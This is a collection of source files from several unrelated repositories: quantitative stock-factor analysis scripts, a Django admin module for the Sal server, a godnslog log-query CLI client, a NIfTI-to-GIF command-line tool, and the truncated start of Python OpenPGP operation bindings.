# 'benew_p5_ma10_hist_kaleido_p05_20180515_0530181708_after_f1',
# 'benew_p06_noma_tvalue_20180928_tp_0935_1000_1001183211111_after_f1',
# 'benew_p05_noma_tvalue_20180901_tp_0935_1000_0904104741953_after_f1',
# 'benew_p02_noma_tvalue_20180901_tp_0935_1000_0923223647237_after_f1',
# 'benew_p02_WTOP_R1011_20180928_tp_0935_1000_1017133635924_after_f1',
# 'benew_p1_noma_tvalue_20180702_0722152621667_after_f1',
#
"predicted_stock_return_f1",
"flow_estimation_fitted_f1",
"fake_2"
]
pool_name = "pool_01_final_f1"
forward_return_name = "forward_return_5_f1"
dates = td.get_trading_dates(start_date, end_date)
# IC = calculate_factor_feature(factors, forward_return_name, pool_name, dates, calculate_IC, direction=-1)
result = calculate_factor_feature(factors, forward_return_name, pool_name, dates, calculate_IC, factor_topRt=0.2)
import pandas as pd
# df = pd.DataFrame(IC, index=dates, columns=factors)
# print(df)
# result = calculate_factor_feature(factors, forward_return_name, pool_name, dates, calculate_IC)
# print(pd.DataFrame(result, index=dates, columns=factors))
# result = calculate_factor_autocorrelation(factors, dates, pool_name)
# # result = calculate_factor_feature(factors, forward_return_name, pool_name, dates, calculate_IC,
# direction=1)
df = pd.DataFrame(result, index=dates, columns=factors)
df.to_csv("model_top_ic.csv")
```
#### File: benew_model/util/calculate_some.py
```python
import pandas as pd
import numpy as np
from collider.utils.logger import user_log
import copy
import os
from collider.utils.decompose.mod import AttributeAnaMod
from common.configure import read_configure
bundle_path = read_configure(name="test")['bundle_path']
config = {
"data_bundle_path":bundle_path,
"benchmark":"000905.SH"
}
ds = AttributeAnaMod(config).DS
pool_name = "pool_01_final_f1"
forward_return_name = "forward_return_5_f1"
def load_fakedvalue(a):
return a * 0.1 + np.random.normal(scale=0.02, size=4000)
def cal_hotcatch(factor_topN = 500,factors = [] ,ret_topN = 1000,dates=None):
"""
计算top组,catch top catch ratio,返回 dataframe
:param factor_topN:
:param factors:
:param ret_topN:
:param dates:
:return:
"""
result = []
for date in dates:
pool = ~np.isnan(ds.get_bar(date=date,columns=[pool_name])[pool_name])
ret = np.array(ds.get_bar(date=date ,columns=[forward_return_name])[forward_return_name])
row = []
for fac in factors:
v = np.array(ds.get_bar(date=date,columns=[fac])[fac])
if fac == "forward_return_5_f1":
v = load_fakedvalue(v)
ret[~pool] = np.nan
v[~pool] = np.nan
code_a = ds.codes[np.argsort(-ret)[:ret_topN]]
code_b = ds.codes[np.argsort(-v)[:factor_topN]]
intersec = set(code_a).intersection(set(code_b))
ratio = len(intersec)*1.0/len(code_b)
row.append(ratio)
result.append(row)
cols = []
for i in factors:
if i == "forward_return_5_f1":
cols.append("faked_" + i )
else:
cols.append(i)
df = pd.DataFrame(result,columns=cols)
df["trade_date"] = dates
return df[["trade_date"] + cols]
def load_top_ret(factors=[],topN=500,weighted_type=1,dates=[]):
"""
计算top组收益,
weighted_type = 1 ,等权
weighted_type = k/sum(1:N) 加权
:param factors:
:param topN:
:param weighted_type:
:param dates:
:return:
"""
if weighted_type == 1:
weg = np.full(topN,1.0/topN)
if weighted_type == 2:
a = np.arange(1,topN+1,1)
weg = a/np.sum(a)
result = []
for date in dates:
data = ds.get_bar(date=date,columns=[pool_name,forward_return_name])
pool = ~np.isnan(data[pool_name])
ret = np.array(data[forward_return_name])
ret[~pool] = np.nan
row = []
for fac in factors:
fac_data = np.array(ds.get_bar(date=date,columns=[fac])[fac])
fac_data[~pool] = np.nan
code_index = np.argsort(-fac_data)[:topN]
v = np.nansum(ret[code_index] * weg[::-1])
row.append(v)
result.append(row)
cols = []
for i in factors:
if i == "forward_return_5_f1":
cols.append("faked_" + i)
else:
cols.append(i)
result = np.cumsum(np.array(result),axis=0)
df = pd.DataFrame(result ,columns=cols)
df["trade_date"] = dates
return df[["trade_date"] + cols]
if __name__ == "__main__":
startdate = "20170101"
end_date = "20181230"
dates = [i for i in sorted(list(ds.dates)) if i >= startdate and i <= end_date]
factor_topN = 500
factors = ["predicted_stock_return_f1","flow_estimation_fitted_f1","forward_return_5_f1"]
ret_topN = 500
#df = cal_hotcatch(factor_topN=500,factors=factors,ret_topN=ret_topN,dates=dates)
#df.to_csv("data/hotcatch_500.csv",index=False)
df = load_top_ret(factors=factors,dates=dates)
df.to_csv("data/group1_return.csv",index=False)
```
#### File: benew_model/util/strategy_feature.py
```python
import numpy as np
from util.decorator import cache, np_cache
from collider.utils.logger import system_log
@np_cache
def benew_rank(return_expectation):
# system_log.info("rank: %s" % np.nansum(return_expectation))
i = 0
rank_num = np.full(len(return_expectation), np.nan)
v0, s0 = np.unique(return_expectation, return_index=True) # 这里不直接用rank/order之类,是为了解决因子值有相同的情况
for v, s in zip(v0, s0):
if np.isnan(v):
pass
else:
rank_num[return_expectation == v] = i
i += 1
rank_num /= i - 1
rank_num[rank_num == 1] -= 1e-8
return rank_num
@cache()
def calculate_rank_mean(**kwargs):
return_rank = benew_rank(-kwargs['stock_return'])
holding_weight = kwargs['holding_weight']
return return_rank[holding_weight > 0].mean()
@cache()
def calculate_rank_weighted_mean(**kwargs):
return_rank = benew_rank(-kwargs['stock_return'])
holding_weight = kwargs['holding_weight']
return np.nansum(return_rank * holding_weight)
@cache()
def calculate_rank_cumsum(**kwargs):
return_rank = benew_rank(-kwargs['stock_return'])
holding_weight = kwargs['holding_weight']
return sum(holding_weight[holding_weight > 0][return_rank[holding_weight > 0] < kwargs["threshold"]])
@cache()
def calculate_exposure_weighted_mean(**kwargs):
exposure = kwargs.get("exposure")
holding_weight = kwargs.get("holding_weight")
hedge_weight = kwargs.get("hedge_weight")
return np.dot(np.nan_to_num(exposure), np.nan_to_num(holding_weight - hedge_weight))
# 利用直线插值,计算x2y和y2x
def x_to_y(x, cum):
y0 = np.insert(cum, 0, 0)
x0 = np.arange(0, len(cum) + 1) / len(cum)
index = np.sum(x0 < x)
return (x - x0[index - 1]) / (x0[index] - x0[index - 1]) * (y0[index] - y0[index - 1]) + y0[index - 1]
def y_to_x(y, cum):
y0 = np.insert(cum, 0, 0)
x0 = np.arange(0, len(cum) + 1) / len(cum)
index = np.sum(y0 < y)
return (y - y0[index - 1]) / (y0[index] - y0[index - 1]) * (x0[index] - x0[index - 1]) + x0[index - 1]
@cache()
def calculate_exposure_CDF(**kwargs):
exposure = kwargs.pop("exposure")
# 如果是多个因子, 那么递归,单因子计算
if len(exposure.shape) > 1 and exposure.shape[0] > 1:
return [calculate_exposure_CDF(exposure=expo, **kwargs) for expo in exposure]
# 以下计算CDF指标
holding_weight = kwargs.get("holding_weight")
hedge_weight = kwargs.get("hedge_weight")
long_side = holding_weight > 0
short_side = hedge_weight > 0
# 排序, cumsum
# 需要减少精度,不然会出现1<1的问题
a = np.argsort(exposure[long_side])
cumWeightL = np.round(np.cumsum(holding_weight[long_side][a]), 8)
b = np.argsort(exposure[short_side])
cumWeightS = np.round(np.cumsum(hedge_weight[short_side][b]), 8)
# HARD-CODE 分100份
# FIXME: 为什么要abs?
return 2 * sum(
[0.01 * abs(j - x_to_y(x=y_to_x(y=j, cum=cumWeightS), cum=cumWeightL)) for j in np.linspace(0, 1, 100)])
```
#### File: benew_model/util/strategy_monitor.py
```python
import pandas as pd
import os
from common.trade_date import generate_trade_date_sequence
from common.data_source_from_bundle import load_data_from_npy
from common.data_source_from_pkl import load_data_from_pkl
from common.strategy import read_holding
from util.strategy_feature import *
def holding_feature(trade_date, strategy_path: str, features=[], hedge_index="weight_index_500", **kwargs):
"""
计算持仓的特征
:param trade_date:
:param strategy_path:
:param features:
:param hedge_index:
:param kwargs:
:return:
"""
trade_date_array = generate_trade_date_sequence(trade_date)
if len(trade_date_array) > 1:
result = pd.concat(
[holding_feature(date, strategy_path, features, hedge_index, **kwargs) for date in trade_date_array]
)
else:
factors = kwargs.get("factors", [])
trade_date_array = trade_date_array[0]
# step 1. read factors exposure
if len(factors) > 0:
kwargs["exposure"] = load_data_from_npy(trade_date_array, factors)
# step 1. read predicted_stock_return
if "stock_return_name" not in kwargs:
# 从pkl文件读predicted_stock_return, kwargs中需要包括root, scenario
kwargs["stock_return"] = load_data_from_pkl(trade_date_array, "predicted_stock_return", **kwargs)
else:
# 从bundle读predicted_stock_return
kwargs["stock_return"] = load_data_from_npy(trade_date_array, [kwargs.get("stock_return_name")])
# load pool if necessary
if "pool_name" in kwargs:
kwargs["pool"] = load_data_from_npy(trade_date_array, kwargs.get("pool_name"))
# step 2. read strategy holding
kwargs["holding_weight"] = read_holding(trade_date_array, strategy_path, offset=0, return_type="numpy")
if hedge_index is not None:
hedge_weight_raw = load_data_from_npy(trade_date_array, hedge_index)
kwargs["hedge_weight"] = np.nan_to_num(hedge_weight_raw) / np.nansum(hedge_weight_raw)
else:
kwargs["hedge_weight"] = None
# step 4. 计算特征
result = []
for fun, name, args in features:
items = name if isinstance(name, list) else [name]
result = result + [pd.DataFrame({
"trade_date": trade_date_array,
"strategy": os.path.basename(strategy_path),
"item": items,
"value": fun(trade_date=trade_date_array, item=items, **kwargs, **args)
})]
result = pd.concat(result)
return result
def calculate_attribution(**kwargs):
"""
归因
:param kwargs:
:return:
"""
pass
if __name__ == "__main__":
factors = ["style_beta_2", "style_size_2"]
_calculate_rank_features = [
(calculate_rank_mean, "rank_mean", {}),
(calculate_rank_weighted_mean, "rank_weighted_mean", {}),
(calculate_rank_cumsum, "rank_cumsum_10", {'threshold': 0.1}),
(calculate_rank_cumsum, "rank_cumsum_20", {'threshold': 0.2}),
(calculate_rank_cumsum, "rank_cumsum_30", {'threshold': 0.3}),
(calculate_rank_cumsum, "rank_cumsum_40", {'threshold': 0.4}),
(calculate_rank_cumsum, "rank_cumsum_50", {'threshold': 0.5})
]
_calculate_exposure_features = [
(calculate_exposure_weighted_mean, ["exposure_" + fac for fac in factors], {}),
(calculate_exposure_CDF, ["exposure_CDF_" + fac for fac in factors], {})
]
d = holding_feature(("20190102", "20190104"), "/Volumes/会牛/策略管理/benew/Simulation/swing6f",
features=_calculate_exposure_features + _calculate_rank_features,
stock_return_name="predicted_stock_return_f1",
factors=factors,
strategy="swing6f",
)
# d.to_csv("test.csv")
print(d)
# attribution = holding_feature(trade_date=("20190102", "20190104"),
# strategy_path="/Volumes/会牛/策略管理/benew/Simulation/swing6f",
# features=[(calculate_attribution,
# ["attr_" + _ for _ in factors],
# {})],
# stock_return="forward_return_1_close_f1",
# pool="pool_01_final_f1",
# factor=factors)
``` |
{
"source": "jokdbx/sal",
"score": 2
} |
#### File: sal/server/admin.py
```python
from django.contrib import admin
from django.forms import ModelForm, ModelMultipleChoiceField
from server.models import *
from server.utils import reload_plugins_model
class BusinessUnitFilter(admin.SimpleListFilter):
title = 'Business Unit'
parameter_name = 'business_unit'
def lookups(self, request, model_admin):
return ((bu.name, bu.name) for bu in BusinessUnit.objects.all())
def queryset(self, request, queryset):
if self.value():
return queryset.filter(machine__machine_group__business_unit__name=self.value())
else:
return queryset
class MachineGroupFilter(admin.SimpleListFilter):
title = 'Machine Group'
parameter_name = 'machine_group'
def lookups(self, request, model_admin):
return ((mg.name, mg.name) for mg in MachineGroup.objects.all())
def queryset(self, request, queryset):
if self.value():
return queryset.filter(machine__machine_group__name=self.value())
else:
return queryset
class MachineGroupInline(admin.TabularInline):
model = MachineGroup
class PluginScriptRowInline(admin.StackedInline):
model = PluginScriptRow
extra = 0
class UpdateHistoryItemInline(admin.TabularInline):
model = UpdateHistoryItem
extra = 0
class UserProfileInline(admin.StackedInline):
model = UserProfile
class BusinessUnitForm(ModelForm):
class Meta:
model = BusinessUnit
fields = ['name', 'users']
users = ModelMultipleChoiceField(
queryset=User.objects.exclude(userprofile__level='GA'),
label=('Members'),
required=False,
widget=admin.widgets.FilteredSelectMultiple(verbose_name="Users", is_stacked=False))
def number_of_users(obj):
return obj.users.count()
def number_of_machine_groups(obj):
return obj.machinegroup_set.count()
def number_of_machines(obj):
if isinstance(obj, MachineGroup):
return Machine.objects.filter(machine_group=obj).count()
else:
return Machine.objects.filter(machine_group__in=obj.machinegroup_set.all()).count()
def business_unit(obj):
return obj.machine_group.business_unit.name
class ApiKeyAdmin(admin.ModelAdmin):
list_display = ('name', 'public_key', 'private_key')
class BusinessUnitAdmin(admin.ModelAdmin):
inlines = [MachineGroupInline, ]
form = BusinessUnitForm
list_display = ('name', number_of_users, number_of_machine_groups, number_of_machines)
fields = (('name', number_of_users, number_of_machine_groups, number_of_machines), 'users')
readonly_fields = (number_of_users, number_of_machine_groups, number_of_machines)
class ConditionAdmin(admin.ModelAdmin):
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'condition_name')
list_display = ('condition_name', 'condition_data', 'machine')
search_fields = ('condition_name', 'condition_data', 'machine__hostname')
class FactAdmin(admin.ModelAdmin):
list_display = ('fact_name', 'fact_data', 'machine')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'fact_name')
search_fields = ('fact_name', 'fact_data', 'machine__hostname')
class HistoricalFactAdmin(admin.ModelAdmin):
list_display = ('fact_name', 'fact_data', 'machine', 'fact_recorded')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'fact_name')
search_fields = ('fact_name', 'fact_data', 'machine__hostname')
date_hierarchy = 'fact_recorded'
class InstalledUpdateAdmin(admin.ModelAdmin):
list_display = ('update', 'display_name', 'machine', 'update_version', 'installed')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'update')
search_fields = ('machine__hostname', 'display_name', 'update')
class MachineAdmin(admin.ModelAdmin):
list_display = ('hostname', 'serial', 'machine_model', 'operating_system', 'deployed')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'operating_system', 'os_family',
'machine_model', 'last_checkin', 'errors', 'warnings', 'puppet_errors',
'deployed')
fields = (
(business_unit, 'machine_group'),
('hostname', 'serial', 'console_user'),
('machine_model', 'machine_model_friendly'),
('cpu_type', 'cpu_speed'), ('memory', 'memory_kb'), ('hd_space', 'hd_total', 'hd_percent'),
('operating_system', 'os_family'),
('munki_version', 'manifest', 'errors', 'warnings'),
('last_checkin', 'first_checkin'),
('puppet_version', 'last_puppet_run', 'puppet_errors'),
('sal_version', 'deployed', 'broken_client'),
'report'
)
readonly_fields = (business_unit, 'first_checkin', 'last_checkin', 'last_puppet_run')
search_fields = ('hostname', 'console_user')
class MachineDetailPluginAdmin(admin.ModelAdmin):
list_display = ('name',)
def get_queryset(self, request):
"""Update db prior to retrieving plugins.
Views listing MachineDetailPlugins must first update the list of
installed plugins.
"""
reload_plugins_model()
return super(MachineDetailPluginAdmin, self).get_queryset(request)
class MachineGroupAdmin(admin.ModelAdmin):
list_display = ('name', 'business_unit', number_of_machines)
list_filter = (BusinessUnitFilter,)
fields = ('name', 'business_unit', number_of_machines, 'key')
readonly_fields = (number_of_machines, 'key')
class PendingUpdateAdmin(admin.ModelAdmin):
list_filter = (BusinessUnitFilter, MachineGroupFilter)
list_display = ('update', 'display_name', 'update_version', 'machine')
search_fields = ('update', 'display_name', 'machine__hostname')
class PluginAdmin(admin.ModelAdmin):
list_display = ('name',)
def get_queryset(self, request):
"""Update db prior to retrieving plugins.
Views listing Plugins must first update the list of
installed plugins.
"""
reload_plugins_model()
return super(PluginAdmin, self).get_queryset(request)
class PluginScriptRowAdmin(admin.ModelAdmin):
search_fields = ('pluginscript_name',)
class PluginScriptSubmissionAdmin(admin.ModelAdmin):
inlines = [PluginScriptRowInline, ]
list_display = ('plugin', 'machine', 'recorded', 'historical')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'plugin', 'historical', 'recorded')
search_fields = ('plugin', 'machine__hostname')
date_hierarchy = 'recorded'
class ReportAdmin(admin.ModelAdmin):
list_display = ('name',)
def get_queryset(self, request):
"""Update db prior to retrieving plugins.
Views listing MachineDetailPlugins must first update the list of
installed plugins.
"""
reload_plugins_model()
return super(ReportAdmin, self).get_queryset(request)
class SalSettingAdmin(admin.ModelAdmin):
list_display = ('name', 'value')
class FriendlyNameCacheAdmin(admin.ModelAdmin):
list_display = ('serial_stub', 'friendly_name')
class UpdateHistoryAdmin(admin.ModelAdmin):
inlines = [UpdateHistoryItemInline, ]
list_display = ('name', 'machine', 'update_type', 'version')
list_filter = ('update_type', BusinessUnitFilter, MachineGroupFilter)
search_fields = ('name', 'machine__hostname', 'version')
class UpdateHistoryItemAdmin(admin.ModelAdmin):
search_fields = ('update_history__name', 'update_history__machine__hostname')
list_display = ('update_history', 'recorded', 'status')
date_hierarchy = 'recorded'
class CustomUserAdmin(admin.ModelAdmin):
inlines = (UserProfileInline,)
list_display = ('username', 'profile_level', 'last_login')
list_filter = ('userprofile__level',)
search_fields = ('username', )
fields = (
('username', 'first_name', 'last_name', 'email'),
('is_staff', 'is_active', 'is_superuser'),
('last_login', 'date_joined'),
)
def profile_level(self, user):
return user.userprofile.level
admin.site.register(ApiKey, ApiKeyAdmin)
admin.site.register(BusinessUnit, BusinessUnitAdmin)
admin.site.register(Condition, ConditionAdmin)
admin.site.register(Fact, FactAdmin)
admin.site.register(HistoricalFact, HistoricalFactAdmin)
admin.site.register(InstalledUpdate, InstalledUpdateAdmin)
admin.site.register(Machine, MachineAdmin)
admin.site.register(MachineDetailPlugin, MachineDetailPluginAdmin)
admin.site.register(MachineGroup, MachineGroupAdmin)
admin.site.register(PendingAppleUpdate, PendingUpdateAdmin)
admin.site.register(PendingUpdate, PendingUpdateAdmin)
admin.site.register(Plugin, PluginAdmin)
admin.site.register(PluginScriptRow, PluginScriptRowAdmin)
admin.site.register(PluginScriptSubmission, PluginScriptSubmissionAdmin)
admin.site.register(Report, ReportAdmin)
admin.site.register(SalSetting, SalSettingAdmin)
admin.site.register(UpdateHistory, UpdateHistoryAdmin)
admin.site.register(UpdateHistoryItem, UpdateHistoryItemAdmin)
admin.site.unregister(User)
admin.site.register(User, CustomUserAdmin)
admin.site.register(FriendlyNameCache, FriendlyNameCacheAdmin)
```
#### File: plugins/operatingsystem/operatingsystem.py
```python
from collections import defaultdict, OrderedDict
from distutils.version import LooseVersion
from django.db.models import Count
import sal.plugin
# This table is also used for sequnecing output, so use OrderedDict.
OS_TABLE = OrderedDict(Darwin='macOS', Windows='Windows', Linux='Linux', ChromeOS='Chrome OS')
class OperatingSystem(sal.plugin.Widget):
description = 'List of operating system versions'
template = 'operatingsystem/templates/operatingsystem.html'
def get_context(self, machines, **kwargs):
context = self.super_get_context(machines, **kwargs)
# Remove invalid versions, then annotate with a count.
os_info = (
machines
.exclude(operating_system__isnull=True)
.exclude(operating_system='')
.order_by('operating_system')
.values('operating_system', 'os_family')
.distinct()
.annotate(count=Count('operating_system')))
grouped = defaultdict(list)
for version in os_info:
os_type = OS_TABLE[version['os_family']]
grouped[os_type].append(version)
# you and your lanbda's @sheacraig...
os_key = lambda x: LooseVersion(x["operating_system"]) # noqa: E731
output = [
(key, sorted(grouped[key], key=os_key, reverse=True)) for key in OS_TABLE.values()]
context['os_info'] = output
return context
def filter(self, machines, data):
try:
os_family, operating_system = data.split('&')
except ValueError:
return None, None
machines = machines.filter(operating_system=operating_system, os_family=os_family)
return machines, 'Machines running {} {}'.format(OS_TABLE[os_family], operating_system)
``` |
{
"source": "joke0jie/godnslog",
"score": 3
} |
#### File: examples/python/cli.py
```python
import requests
import hashlib
import time
import json
import getopt, sys
class Client(object):
def __init__(self, domain, secret, ssl):
self.domain = domain
self.secret = secret
self.host = 'http://' + domain
if ssl:
self.host = 'https://' + domain
@staticmethod
def hash(query):
m = hashlib.new('md5')
keys = list(query.keys())
keys.sort()
for key in keys:
m.update(query[key].encode(encoding='UTF-8'))
m.update(secret.encode(encoding='UTF-8'))
return m.hexdigest()
def query_dns(self, q, blur=False):
payload = {}
payload['t'] = str(int(time.time()))
print('t=', int(time.time()), payload['t'])
payload['q'] = q
if blur:
payload['blur'] = '1'
else:
payload['blur'] = '0'
payload['hash'] = Client.hash(payload)
r = requests.get(self.host + '/data/dns', payload)
print('resp:', r.text)
j = json.loads(r.text)
if r.status_code == 200:
return j['result'], j['message']
else:
return None, j['message']
def query_http(self, q, blur):
payload = {}
payload['t'] = ''.format('{}', int(time.time()))
payload['q'] = q
if blur:
payload['blur'] = '1'
else:
payload['blur'] = '0'
payload['hash'] = Client.hash(payload)
r = requests.get(self.host + '/data/http', payload)
print('resp:', r.text)
j = json.loads(r.text)
if r.status_code == 200:
return j['result'], j['message']
else:
return None, j['message']
def usage():
print('cli: query dns/http log result')
sys.exit()
if __name__ == '__main__':
try:
options, args = getopt.getopt(sys.argv[1:], "hs:d:t:q:l:", [ "help", "blur", "ssl", "domain=", "secret=", "query=", "type=dns" ])
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
secret = ''
domain = ''
ssl = False
type = 'dns'
blur = False
query = ''
for option, value in options:
if option in ("-h", "--help"):
usage()
if option in ("-s", "--secret"):
secret = str(value)
if option in ("-d", "--domain"):
domain = str(value)
if option in ("-q", "--query"):
query = str(value)
if option in ("-t", "--type"):
cmd = str(value)
if option in ("-b", "--bulr"):
bulr = True
if option in ("-l", "--ssl"):
ssl = True
if secret == '' or domain == '' or query == '':
print("secret,domain,query are required")
sys.exit()
c = Client(domain, secret, ssl)
if type == 'dns':
r, m = c.query_dns(query, blur)
print(m, r)
elif type == 'http':
r,m = c.query_http(query, blur)
print(m, r)
else:
print('unknown type', type, 'only support dns/http')
``` |
{
"source": "joke1196/gif_your_nifti",
"score": 2
} |
#### File: gif_your_nifti/gif_your_nifti/__main__.py
```python
import argparse
import gif_your_nifti.config as cfg
from gif_your_nifti import core, __version__
import warnings # mainly for ignoring imageio warnings
warnings.filterwarnings("ignore")
def main():
"""Commandline interface."""
parser = argparse.ArgumentParser()
parser.add_argument(
'filename', metavar='path', nargs='+',
help="Path to image. Multiple paths can be provided."
)
parser.add_argument(
'--mode', type=str, required=False,
metavar=cfg.mode, default=cfg.mode,
help="Gif creation mode. Available options are: 'normal', \
'pseudocolor', 'depth', 'rgb'"
)
parser.add_argument(
'--fps', type=int, required=False,
metavar=cfg.fps, default=cfg.fps,
help="Frames per second."
)
parser.add_argument(
'--size', type=float, required=False,
metavar=cfg.size, default=cfg.size,
help="Image resizing factor."
)
parser.add_argument(
'--cmap', type=str, required=False,
metavar=cfg.cmap, default=cfg.cmap,
help="Color map. Used only in combination with 'pseudocolor' mode."
)
parser.add_argument(
'--output', type=str, required=False,
metavar=cfg.output, default=cfg.output,
help="Define a name for the output file"
)
parser.add_argument(
'--pixel_num', type=int, required=False,
metavar=cfg.pixel_num, default=cfg.pixel_num,
help="Define a maximum size for the output image"
)
args = parser.parse_args()
cfg.mode = (args.mode).lower()
cfg.size = args.size
cfg.fps = args.fps
cfg.cmap = args.cmap
cfg.output = args.output
cfg.pixel_num = args.pixel_num
# Welcome message
welcome_str = '{} {}'.format('gif_your_nifti', __version__)
welcome_decor = '=' * len(welcome_str)
print('{}\n{}\n{}'.format(welcome_decor, welcome_str, welcome_decor))
print('Selections:')
print(' mode = {}'.format(cfg.mode))
print(' fps = {}'.format(cfg.fps))
print(' outputfile = {}'.format(cfg.output))
print(' pixel_num = {}'.format(cfg.pixel_num))
# Determine gif creation mode
if cfg.mode in ['normal', 'pseudocolor', 'depth']:
for f in args.filename:
if cfg.mode == 'normal':
core.write_gif_normal(f, cfg.output, cfg.pixel_num,cfg.size, cfg.fps)
elif cfg.mode == 'pseudocolor':
print(' cmap = {}'.format(cfg.cmap))
core.write_gif_pseudocolor(f, cfg.output, cfg.pixel_num, cfg.size, cfg.fps, cfg.cmap)
elif cfg.mode == 'depth':
core.write_gif_depth(f, cfg.output, cfg.pixel_num,cfg.size, cfg.fps)
elif cfg.mode == 'rgb':
if len(args.filename) != 3:
raise ValueError('RGB mode requires 3 input files.')
else:
core.write_gif_rgb(args.filename[0], args.filename[1],
args.filename[2], cfg.pixel_num,cfg.size, cfg.fps)
else:
raise ValueError("Unrecognized mode.")
print('Finished.')
if __name__ == "__main__":
main()
``` |
{
"source": "joke325/Py3rop",
"score": 2
} |
#### File: Py3rop/pyrop/op.py
```python
__version__ = "0.3.0"
# Copyright (c) 2020 Janky <<EMAIL>>
# All right reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
from weakref import ref as weakref
from .rop.err import ROPE
from .error import RopError
from .util import _call_rop_func, _new_rop_obj, _get_rop_string, _timedelta2sec, \
_ts2datetime, _datetime2ts
from .key import RopKey
from .sign import RopSign
class RopSignSignature(object):
'''OP Sign Signature proxy
'''
def __init__(self, own, sgid):
self.__own = weakref(own)
self.__lib = own.lib
if sgid is None or sgid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__sgid = sgid
@property
def handle(self): return self.__sgid
# API
def set_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_sign_signature_set_hash, 0, self.__sgid, hash_)
def set_creation_time(self, create):
_call_rop_func(self.__lib.rnp_op_sign_signature_set_creation_time, 0, self.__sgid, \
_datetime2ts(create))
def set_expiration_time(self, expires):
_call_rop_func(self.__lib.rnp_op_sign_signature_set_expiration_time, 0, self.__sgid, \
_datetime2ts(expires))
class RopOpSign(object):
'''OP Sign proxy
'''
def __init__(self, own, opid):
self.__own = weakref(own)
self.__lib = own.lib
if opid is None or opid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__opid = opid
def _close(self):
ret = self.__lib.rnp_op_sign_destroy(self.__opid)
self.__opid = None
return ret
@property
def handle(self): return self.__opid
# API
def set_compression(self, compression, level):
_call_rop_func(self.__lib.rnp_op_sign_set_compression, 0, self.__opid, compression, level)
def set_armor(self, armored):
_call_rop_func(self.__lib.rnp_op_sign_set_armor, 0, self.__opid, armored)
def set_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_sign_set_hash, 0, self.__opid, hash_)
def set_creation_time(self, create):
_call_rop_func(self.__lib.rnp_op_sign_set_creation_time, 0, self.__opid, \
_datetime2ts(create))
def set_expiration_time(self, expire):
_call_rop_func(self.__lib.rnp_op_sign_set_expiration_time, 0, self.__opid, \
_datetime2ts(expire))
def set_expiration(self, expiration):
_call_rop_func(self.__lib.rnp_op_sign_set_expiration_time, 0, self.__opid, \
_timedelta2sec(expiration))
def set_file_name(self, filename):
_call_rop_func(self.__lib.rnp_op_sign_set_file_name, 0, self.__opid, filename)
def set_file_mtime(self, mtime):
_call_rop_func(self.__lib.rnp_op_sign_set_file_mtime, 0, self.__opid, \
_datetime2ts(mtime))
def execute(self):
_call_rop_func(self.__lib.rnp_op_sign_execute, 0, self.__opid)
def add_signature(self, key):
hkey = (key.handle if key is not None else None)
sig = _call_rop_func(self.__lib.rnp_op_sign_add_signature, 1, self.__opid, hkey)
return RopSignSignature(self.__own(), sig)
class RopOpGenerate(object):
'''OP Generate proxy
'''
def __init__(self, own, opid):
self.__own = weakref(own)
self.__lib = own.lib
if opid is None or opid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__opid = opid
def _close(self):
ret = self.__lib.rnp_op_generate_destroy(self.__opid)
self.__opid = None
return ret
@property
def handle(self): return self.__opid
# API
def set_bits(self, bits):
_call_rop_func(self.__lib.rnp_op_generate_set_bits, 0, self.__opid, bits)
def set_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_generate_set_hash, 0, self.__opid, hash_)
def set_dsa_qbits(self, qbits):
_call_rop_func(self.__lib.rnp_op_generate_set_dsa_qbits, 0, self.__opid, qbits)
def set_curve(self, curve):
_call_rop_func(self.__lib.rnp_op_generate_set_curve, 0, self.__opid, curve)
def set_protection_password(self, password):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_password, 0, self.__opid, password)
def set_request_password(self, request):
_call_rop_func(self.__lib.rnp_op_generate_set_request_password, 0, self.__opid, request)
def set_protection_cipher(self, cipher):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_cipher, 0, self.__opid, cipher)
def set_protection_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_hash, 0, self.__opid, hash_)
def set_protection_mode(self, mode):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_mode, 0, self.__opid, mode)
def set_protection_iterations(self, iterations):
_call_rop_func(self.__lib.rnp_op_generate_set_protection_iterations, 0, self.__opid, \
iterations)
def add_usage(self, usage):
_call_rop_func(self.__lib.rnp_op_generate_add_usage, 0, self.__opid, usage)
def clear_usage(self):
_call_rop_func(self.__lib.rnp_op_generate_clear_usage, 0, self.__opid)
def set_usages(self, usages):
